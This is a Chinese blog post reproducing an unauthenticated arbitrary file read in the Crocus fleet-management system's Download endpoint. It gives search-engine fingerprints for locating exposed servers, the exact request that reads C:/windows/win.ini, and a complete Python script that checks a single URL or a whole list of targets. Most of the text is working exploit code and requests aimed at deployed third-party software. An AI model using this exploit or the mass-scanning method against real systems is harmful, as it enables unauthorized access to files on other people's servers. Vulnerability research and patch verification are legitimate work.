【漏洞复现】Crocus系统文件读取漏洞复现

最新推荐文章于 2024-09-12 15:54:41 发布

A 八方

最新推荐文章于 2024-09-12 15:54:41 发布

阅读量417

点赞数 9

分类专栏：漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/qq_48368964/article/details/141138692

版权

漏洞复现专栏收录该内容

15 篇文章 0 订阅

订阅专栏

》》》漏洞描述《《《

Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术，帮助商用车减少交通事故和货物丢失，提高企业或车队的运营效率。其Download接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。

》》》信息收集《《《

fofa：body="inp_verification"
hunter：web.body="inp_verification"

》》》漏洞复现《《《

访问目标网站

构造数据包

GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host:ip

成功读取win.ini文件，存在任意文件读取漏洞

批量测试

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
该脚本用于检测目标URL是否存在Crocus-Download任意文件读取漏洞。
通过发送HTTP请求并检查响应内容来判断漏洞是否存在。
"""

import requests
import argparse
from urllib3.exceptions import InsecureRequestWarning

# 忽略SSL证书验证警告
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 定义常量，用于文本颜色高亮
RED = '\033[91m'
RESET = '\033[0m'

def check_file_read(url):
    """
    检查给定URL是否存在任意文件读取漏洞。

    :param url: 待检测的URL。
    """
    # 设置User-Agent头，模拟浏览器请求
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'
    }

    # 构造请求的URL，尝试读取C:/windows/win.ini文件
    file_read_url = f"{url.rstrip('/')}/Service.do?Action=Download&Path=C:/windows/win.ini"
  
    try:
        # 发送GET请求，并忽略SSL证书验证
        response = requests.get(file_read_url, headers=headers, verify=False, timeout=30)
        # 检查响应状态码是否为200，并且响应内容是否包含"fonts"，作为漏洞存在的标志
        if response.status_code == 200 and "fonts" in response.text:
            print(f"{RED}URL [{url}] 存在 Crocus-Download 任意文件读取漏洞{RESET}")
        else:
            print(f"URL [{url}] 可能不存在漏洞")
    except requests.RequestException as e:
        # 打印请求过程中发生的异常
        print(f"URL [{url}] 请求失败: {e}")

def main():
    """
    主函数，负责解析命令行参数并调用漏洞检测函数。
    """
    # 使用argparse库解析命令行参数
    parser = argparse.ArgumentParser(description='检测目标地址是否存在 Crocus-Download 任意文件读取漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    # 如果指定了URL参数
    if args.url:
        # 如果URL没有以http://或https://开头，自动添加
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_file_read(args.url)
    # 如果指定了文件参数
    elif args.file:
        # 打开文件，读取其中的URLs
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            # 遍历每个URL进行检测
            for url in urls:
                # 如果URL没有以http://或https://开头，自动添加
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_file_read(url)

if __name__ == '__main__':
    main()

运行截图